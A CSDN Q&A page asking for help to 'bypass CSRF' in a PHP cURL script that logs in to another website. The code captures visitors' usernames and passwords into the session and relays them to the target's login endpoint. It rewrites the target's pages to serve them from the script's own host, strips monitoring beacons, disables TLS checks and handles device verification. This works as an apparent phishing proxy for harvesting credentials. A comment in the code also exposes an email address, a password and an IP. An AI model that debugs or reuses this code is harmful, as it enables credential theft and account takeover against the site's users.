绕过csrf php curl登录

I want login from a PHP script to another website but I always get this field empty:

vhrp_lt=false

I extract the CSRF token from a cookie files from website but it seems it is wrong. This is my code:

if(isset($_POST['login']) && isset($_POST['password'])){
    $ioBB = "";
   $username = htmlentities($_POST['login']);
   $password = htmlentities($_POST['password']);
   $post_data = "";

   $jsdfs_contact = "";
   $Sign = "Sign+In";
   $ip =  getenv("REMOTE_ADDR");
   $_SESSION['username'] = "";
   $_SESSION['password'] = "";
   //{"username":"donaldhess@hotmail.com","password":"asdasdasdas","remember":true,"ownerId":-1,"hasMultipleEmails":false,"captchaRequired":"false","captchaResponse":null,"userIP":"\"79.116.45.158\"","token":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ7XCJ2YWxpZGl0eVwiOlwiMjAxNi0wNS0xOFQyMzoyNzoxMS45MjhcIixcInNlc3Npb25JZFwiOlwiM0Q0QjgzRjIyRjIzNTI3Q0YxMjQ5NEFEMjVDNTBDMDNcIn0ifQ.6LKcFMYrLDLUvNmtAeA1VU1XkBxLOJopb9-894oxdmo"};
   $post_data = 'jsdfs_contact='.$_POST['jsdfs_contact'].'&login='.$username.'&password='.$password.'&ioBB='.$_POST['ioBB'].'&Sign+In='.$Sign.'vhrp_lt=';

$_SESSION['username'] = $username;
$_SESSION['password'] = $password;
    setOpt($post_data,"login");

}else{
    setOpt("","checkThis");
}

$agent = $_SERVER['HTTP_USER_AGENT'];

$rand = dirname(__FILE__)."/cookies/".getenv("REMOTE_ADDR");

     $ch = curl_init();

    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_URL, $login_url );
    if(strlen($post_data) > 0){
        $file2 = file_get_contents(dirname(__FILE__)."/cookies/".getenv("REMOTE_ADDR").".txt");
    preg_match_all('#vhrp_lt(.*)#si',$file2,$tokens);
    $tokens = preg_replace('/\s*/', '', $tokens[1][0]);
    $tokens4 = substr($tokens, 0, 80);
        curl_setopt($ch, CURLOPT_URL, "http://www.url.com/login_exec.php");
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data.$tokens4);

    }
    curl_setopt($ch, CURLOPT_HEADER, FALSE);
    curl_setopt($ch, CURLOPT_REFERER, $login_url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $rand.'.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, $rand.'.txt');
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,  FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_REFERER, "https://www.url.com/login.html");
    $postResult = curl_exec($ch);
    $info = curl_getinfo($ch);
    //print_R($info);exit;

    //$postResult = str_replace('ua/ua-config.js', "./ua/ua-config.js", $postResult);
    //$postResult = str_replace('main-build.min.js', ' ', $postResult);
    $postResult = str_replace('href="javascript:;', '"', $postResult);
    $postResult = str_replace('href="/', 'href="', $postResult);
    //$postResult = str_replace('action="/login_exec.php"', 'action=""', $postResult);
    $postResult = str_replace("login_exec.php", "", $postResult);
    $postResult = str_replace("login.html", "", $postResult);
    $postResult = str_replace('/e.gif', 'https://www.url.com/e.gif"', $postResult);
    $postResult = str_replace('id="captcha" src="', 'id="captcha" src="https://www.url.com', $postResult);
    $postResult = str_replace('src="/libraries/javascript/regExp.js', 'src="https://www.url.com/libraries/javascript/regExp.js', $postResult);
    $postResult = str_replace('src="//www.googleadservices.com/pagead/conversion.js', 'src="https://www.googleadservices.com/pagead/conversion.js', $postResult);
    $postResult = str_replace('src="//googleads.g.doubleclick.net', 'src="https://googleads.g.doubleclick.net', $postResult);
    $postResult = str_replace('//www.google-analytics.com', 'https://www.google-analytics.com', $postResult);
    $postResult = str_replace('https://assets-edge.url.com/libraries/javascript/site_pages_2.2.203.min.js', 'site_pages_2.2.203.min.js', $postResult);
    $postResult = str_replace('/ajax_files/insert_page_load_stats.php', 'https://www.url.com/ajax_files/insert_page_load_stats.php', $postResult);
    $postResult = str_replace('//bat.bing.com', 'https://bat.bing.com', $postResult);
    $postResult = str_replace('"errorBeacon":"bam.nr-data.net"', '', $postResult);
    $postResult = str_replace('beacon":"bam.nr-data.net"', '', $postResult);
    $postResult = str_replace('js-agent.newrelic.com/nr-974.min.js', '', $postResult);
    $file2 = file_get_contents(dirname(__FILE__)."/cookies/".getenv("REMOTE_ADDR").".txt");
    preg_match_all('#vhrp_lt(.*)#si',$file2,$tokens);
    $tokens = preg_replace('/\s*/', '', $tokens[1][0]);
    $tokens4 = substr($tokens, 0, 80);
    $postResult = str_replace('id="csrfp_hidden_data_urls" value=\'[]\'>', 'id="csrfp_hidden_data_urls" value=\''.$tokens4.'\'>', $postResult);

   if(preg_match("/verify_device\.php/",$postResult,$find)){
       $ch = curl_init();
        $login_url  = "https://www.url.com/verify_device.php";
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_URL, $login_url );
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_REFERER, $login_url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $rand.'.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, $rand.'.txt');
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,  2);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    //curl_setopt($ch, CURLOPT_MAXREDIRS, 5 );
    curl_setopt($ch, CURLOPT_REFERER, $login_url);
    $postResult = curl_exec($ch);
    $info = curl_getinfo($ch);
   }

    echo $postResult;

And the cookies is look li this:

#HttpOnly_www.url.com   FALSE   /   TRUE    0   PHPSESSID   8ob60motf0elfqs4nv0e4rp0g1
www.url.com FALSE   /   FALSE   1477596688  vhrp_lt 678b53f6f2c183f7a4f3188e942a86ccdde2c553b319792cca4801e7bd0a9bb9c252057a0df225a8
.url.com    TRUE    /   FALSE   1793127692  unique_visitor_cookie   b110668554cf3a1a706d526036e60bbd
.url.com    TRUE    /   FALSE   0   utsession_cookie    64692f0a77e35c2d2beeef18e5a7e43a
.url.com    TRUE    /   FALSE   1478199692  vhr-mcid    %7B%22m%22%3A%2226527%22%7D

Please help me and tell me where I made a mistake. I get the token with this $tokens4 but when I make the post to the website the field of token are empty and i want to know why!

dqt83336
dqt83336 另外我试图从cookie中获取vhrp_lt:if(!isset($_COOKIE['vhrp_lt'])){echo“Thecookie:'”。$_COOKIE['vhrp_lt']。“'没有设定。<br><br><br>”;}else{$ts​​t=$_COOKIE['vhrp_lt'];echo“cookie的价值:”。$_COOKIE['vhrp_lt']。“-fin<br><br><br>”;但是价值是空的,我无法理解为什么!
接近 4 年之前 回复
dongtan7998
dongtan7998 是的我做到了,但是当我发送请求时,空白字段必须由$tokens4填充。我不知道是什么问题!
接近 4 年之前 回复
dpj83664
dpj83664 你在发送请求之前调试了$tokens4吗?
接近 4 年之前 回复
Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
立即提问